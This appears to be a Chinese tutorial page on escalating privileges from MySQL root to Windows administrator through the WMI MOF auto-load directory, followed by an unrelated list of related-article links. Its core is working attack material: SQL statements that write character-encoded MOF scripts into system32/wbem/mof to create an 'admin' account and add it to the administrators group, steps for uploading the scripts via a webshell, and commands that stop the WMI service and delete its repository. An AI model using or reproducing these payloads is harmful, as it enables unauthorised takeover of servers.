一、测试环境

win2003 + phpnow

二、使用条件

mysql + root权限

三、工具准备

(1)工具1: 准备好mof提权脚本(具体mof脚本,已上传网盘)

(2)工具2: 准备好菜刀(文件管理 + 数据库管理)

四、提权原理

上传mof提权脚本到mof默认加载目录(路径:c:/windows/system32/wbem/mof),系统会在每一分钟的某一个固定时间运行mof目录下的mof脚步文件,以下实验脚本是在每分钟的第5秒钟运行此脚本;

五、实现方法:

5.1 方法1:直接使用菜刀数据库管理功能,进行sql导出操作,导出mof的ascii文件到mof目录下

(参考:http://www.cnblogs.com/cnsanshao/p/5546872.html)

(1) 第一步:导出添加用户"mof脚本"  (admin/admin)

select char(35,112,114,97,103,109,97,32,110,97,109,101,115,112,97,99,101,40,34,92,92,92,92,46,92,92,114,111,111,116,92,92,115,117,98,115,99,114,105,112,116,105,111,110,34,41,13,10,13,10,105,110,115,116,97,110,99,101,32,111,102,32,95,95,69,118,101,110,116,70,105,108,116,101,114,32,97,115,32,36,69,118,101,110,116,70,105,108,116,101,114,13,10,123,13,10,32,32,32,32,69,118,101,110,116,78,97,109,101,115,112,97,99,101,32,61,32,34,82,111,111,116,92,92,67,105,109,118,50,34,59,13,10,32,32,32,32,78,97,109,101,32,32,61,32,34,102,105,108,116,80,50,34,59,13,10,32,32,32,32,81,117,101,114,121,32,61,32,34,83,101,108,101,99,116,32,42,32,70,114,111,109,32,95,95,73,110,115,116,97,110,99,101,77,111,100,105,102,105,99,97,116,105,111,110,69,118,101,110,116,32,34,13,10,32,32,32,32,32,32,32,32,32,32,32,32,34,87,104,101,114,101,32,84,97,114,103,101,116,73,110,115,116,97,110,99,101,32,73,115,97,32,92,34,87,105,110,51,50,95,76,111,99,97,108,84,105,109,101,92,34,32,34,13,10,32,32,32,32,32,32,32,32,32,32,32,32,34,65,110,100,32,84,97,114,103,101,116,73,110,115,116,97,110,99,101,46,83,101,99,111,110,100,32,61,32,53,34,59,13,10,32,32,32,32,81,117,101,114,121,76,97,110,103,117,97,103,101,32,61,32,34,87,81,76,34,59,13,10,125,59,13,10,13,10,105,110,115,116,97,110,99,101,32,111,102,32,65,99,116,105,118,101,83,99,114,105,112,116,69,118,101,110,116,67,111,110,115,117,109,101,114,32,97,115,32,36,67,111,110,115,117,109,101,114,13,10,123,13,10,32,32,32,32,78,97,109,101,32,61,32,34,99,111,110,115,80,67,83,86,50,34,59,13,10,32,32,32,32,83,99,114,105,112,116,105,110,103,69,110,103,105,110,101,32,61,32,34,74,83,99,114,105,112,116,34,59,13,10,32,32,32,32,83,99,114,105,112,116,84,101,120,116,32,61,13,10,32,32,32,32,34,118,97,114,32,87,83,72,32,61,32,110,101,119,32,65,99,116,105,118,101,88,79,98,106,101,99,116,40,92,34,87,83,99,114,105,112,116,46,83,104,101,108,108,92,34,41,92,110,87,83,72,46,114,117,110,40,92,34,110,101,116,46,101,120,101,32,117,115,101,114,32,97,100,109,105,110,32,97,100,109,105,110,32,47,97,100,100,92,34,41,34,59,13,10,32,125,59,13,10,13,10,105,110,115,116,97,110,99,101,32,111,102,32,95,95,70,105,108,116,101,114,84,111,67,111,110,115,117,109,101,114,66,105,110,100,105,110,103,13,10,123,13,10,32,32,32,32,67,111,110,115,117,109,101,114,32,32,32,61,32,36,67,111,110,115,117,109,101,114,59,13,10,32,32,32,32,70,105,108,116,101,114,32,61,32,36,69,118,101,110,116,70,105,108,116,101,114,59,13,10,125,59) into dumpfile  'c:/windows/system32/wbem/mof/nullevt.mof';

(1) 第二步:导出添加普通用户到超级管理组的“mof脚本 ”

select char(35,112,114,97,103,109,97,32,110,97,109,101,115,112,97,99,101,40,34,92,92,92,92,46,92,92,114,111,111,116,92,92,115,117,98,115,99,114,105,112,116,105,111,110,34,41,13,10,13,10,105,110,115,116,97,110,99,101,32,111,102,32,95,95,69,118,101,110,116,70,105,108,116,101,114,32,97,115,32,36,69,118,101,110,116,70,105,108,116,101,114,13,10,123,13,10,32,32,32,32,69,118,101,110,116,78,97,109,101,115,112,97,99,101,32,61,32,34,82,111,111,116,92,92,67,105,109,118,50,34,59,13,10,32,32,32,32,78,97,109,101,32,32,61,32,34,102,105,108,116,80,50,34,59,13,10,32,32,32,32,81,117,101,114,121,32,61,32,34,83,101,108,101,99,116,32,42,32,70,114,111,109,32,95,95,73,110,115,116,97,110,99,101,77,111,100,105,102,105,99,97,116,105,111,110,69,118,101,110,116,32,34,13,10,32,32,32,32,32,32,32,32,32,32,32,32,34,87,104,101,114,101,32,84,97,114,103,101,116,73,110,115,116,97,110,99,101,32,73,115,97,32,92,34,87,105,110,51,50,95,76,111,99,97,108,84,105,109,101,92,34,32,34,13,10,32,32,32,32,32,32,32,32,32,32,32,32,34,65,110,100,32,84,97,114,103,101,116,73,110,115,116,97,110,99,101,46,83,101,99,111,110,100,32,61,32,53,34,59,13,10,32,32,32,32,81,117,101,114,121,76,97,110,103,117,97,103,101,32,61,32,34,87,81,76,34,59,13,10,125,59,13,10,13,10,105,110,115,116,97,110,99,101,32,111,102,32,65,99,116,105,118,101,83,99,114,105,112,116,69,118,101,110,116,67,111,110,115,117,109,101,114,32,97,115,32,36,67,111,110,115,117,109,101,114,13,10,123,13,10,32,32,32,32,78,97,109,101,32,61,32,34,99,111,110,115,80,67,83,86,50,34,59,13,10,32,32,32,32,83,99,114,105,112,116,105,110,103,69,110,103,105,110,101,32,61,32,34,74,83,99,114,105,112,116,34,59,13,10,32,32,32,32,83,99,114,105,112,116,84,101,120,116,32,61,13,10,32,32,32,32,34,118,97,114,32,87,83,72,32,61,32,110,101,119,32,65,99,116,105,118,101,88,79,98,106,101,99,116,40,92,34,87,83,99,114,105,112,116,46,83,104,101,108,108,92,34,41,92,110,87,83,72,46,114,117,110,40,92,34,110,101,116,46,101,120,101,32,108,111,99,97,108,103,114,111,117,112,32,97,100,109,105,110,105,115,116,114,97,116,111,114,115,32,97,100,109,105,110,32,47,97,100,100,92,34,41,34,59,13,10,32,125,59,13,10,13,10,105,110,115,116,97,110,99,101,32,111,102,32,95,95,70,105,108,116,101,114,84,111,67,111,110,115,117,109,101,114,66,105,110,100,105,110,103,13,10,123,13,10,32,32,32,32,67,111,110,115,117,109,101,114,32,32,32,61,32,36,67,111,110,115,117,109,101,114,59,13,10,32,32,32,32,70,105,108,116,101,114,32,61,32,36,69,118,101,110,116,70,105,108,116,101,114,59,13,10,125,59) into dumpfile  'c:/windows/system32/wbem/mof/nullevt.mof';

5.2 方法2: webshell低权限上传+sql root导出操作权限,实现mof上传至mof自动加载目录下;

(1) 第一步:在获取有低权限的webshell的情况下,直接上传“提权的两个mof脚本”到webshell可以写入的目录下;(这里假设可以写入的目录为c:/)

### 直接使用菜刀文件管理功能,进行mof提权脚本的上传即可。

(2) 第二步:使用mysql root权限可以写入文件到任何目录下的操作,导出已上传的mof文件到mof自动加载目录;

mysql> select load_file('c:/admin.mof') into dumpfile 'c:/windows/system32/wbem/mof/admin.mof';

注意:建议2分钟后,再导出“第二个添加用户组的mof脚本”;

mysql> select load_file('c:/admins.mof') into dumpfile 'c:/windows/system32/wbem/mof/admins.mof';

5.3 方法3: 如果直接获取有phpmyadmin的root操作权限,可以直接操作sql进行“ascii格式mof文件”导出;

导入语句,请见5.1

六、 提权扫尾工作

默认上传mof脚本,它还是会在每分钟的第5s添加一次用户,那如何解决这个问题,具体操作如下:

第一 net stop winmgmt 停止服务,

第二 删除文件夹:rd /s/q C:\WINDOWS\system32\wbem\Repository

第三 net start winmgmt 启动服务

mysql mof提权_三、mysql 之mof提权学习相关推荐

  1. mysql udf提权_三分钟解析postgresql提权

    本头条号所分享文章仅供学习交流,请勿非法使用! 近期遇到一些关于提权的问题,和大家分享一下~ 创建环境 介绍 docker中有一个COPY命令: COPY 在 PostgreSQL表和标准文件系统文件 ...

  2. mysql报错注入_关于Mysql注入过程中的三种报错方式

    放点原来的笔记,Mysql在执行语句的时候会抛出异常信息信息,而php+mysql架构的网站往往又将错误代码显示在页面上,这样可以通过构造如下三种方法获取特定数据. 实际测试环境: Default m ...

  3. mysql 禁止插入重复数据_防止MySQL重复插入数据的三种方法

    新建表格 CREATE TABLE `person` ( `id` int NOT NULL COMMENT '主键', `name` varchar(64) CHARACTER SET utf8 C ...

  4. mysql配置数据库连接池_三种数据库连接池的配置

    三种数据库连接池的配置及使用(For JDBC) 连接池的优缺点 优点 使用连接池的最主要的优点是性能.创建一个新的数据库连接所耗费的时间主要取决于网络的速 度以及应用程序和数据库服务器的 ( 网络 ...

  5. mysql初始设置_三 mysql 初始配置

    常用命令: service mysql start service mysql stop service mysql restart 登录mysql /www/lnmp/mysql/bin/mysql ...

  6. mysql添加函数库_创建mysql函数

    如何使用MySQL提升权限 前不久网上公开了一个MySQL Func的漏洞,讲的是使用MySQL创建一个自定义的函数,然后通过这个函数来攻击服务器.最早看到相关的报道是在o-otik上,但是公布的是针 ...

  7. mysql数据库范围之内_是mysql范围

    MySQL数据类型-decimal详解 1.首先,对于精度比较高的东西,比如money,我会用decimal类型,不会考虑float,double,因为他们容易产生误差,numeric和decimal ...

  8. 找回mysql账号密码怎么办_找回mysql用户

    MySQL_忘记Root密码并找回 Mysql找回Root密码 首先,大家如果看到有什么不懂的地方,欢迎吐槽!!! 我会在当天或者第二天及时回复,并且改进~~ 一.首先确认服务器出于安全的状态,也就是 ...

  9. mysql数据库建仓范式_存mysql个数

    MySQL学习笔记之数据类型详解 注:以下内容针对MySQL5.0及以上版本 MySQL的数据类型非常多,选择正确的数据类型对于获得高性能至关重要,本文是我结合网上看到的一些blog加上<高性能 ...

最新文章

  1. 今日宇宙最热科技:人工智能可预测死亡时间,马斯克拿下美空军1.3亿合同!...
  2. HTML语义化:HTML5新标签——template
  3. 百分点内存数据库架构演变
  4. 关于SQL Server的若干注意事项
  5. 函数形参传递概念及问题分析
  6. 树莓派超声波模块测距
  7. Firefox删除DNS缓存——修改hosts后,无需关闭
  8. 手推机器学习公式(一) —— BP 反向传播算法
  9. jQuery-瀑布流-绝对定位布局(二)(延迟AJAX加载图片)
  10. 后端返回list前端如何处理_前端、后端、全栈是什么?薪资前景如何?
  11. ElasticStack系列之九 master、data 和 client 节点
  12. java枚举构造器_java枚举类的构造函数实例详解
  13. ESN学习笔记——echotorch(1)介绍
  14. linux文件误删恢复解决方案
  15. 程序员掉入传销组织用“代码”求救,同事秒懂
  16. 爱情、面包论——真正的爱情
  17. 静态监听 lsnrctl reload
  18. 如何提高文献检索能力?
  19. C语言 | getchar()、getche()、getch()的区别?
  20. Hive正则表达式案例总结

热门文章

  1. 字符串搜索算法:暴力搜索,KMP
  2. php session unset,PHP中session_unset()和session_destroy()的区别是什么
  3. 技术工坊|BANCOR算法详解及代码实现(上海)
  4. Java期末大作业——六级词汇学习系统
  5. XMU信息类电气实训_____PLC实训报告
  6. 程序员想干一辈子行不行?
  7. Go Slice【Go语言圣经笔记】
  8. .Net给图片加上文字
  9. The Inventor Mentor-第十二章 传感器
  10. 用javamail发送带附件的邮件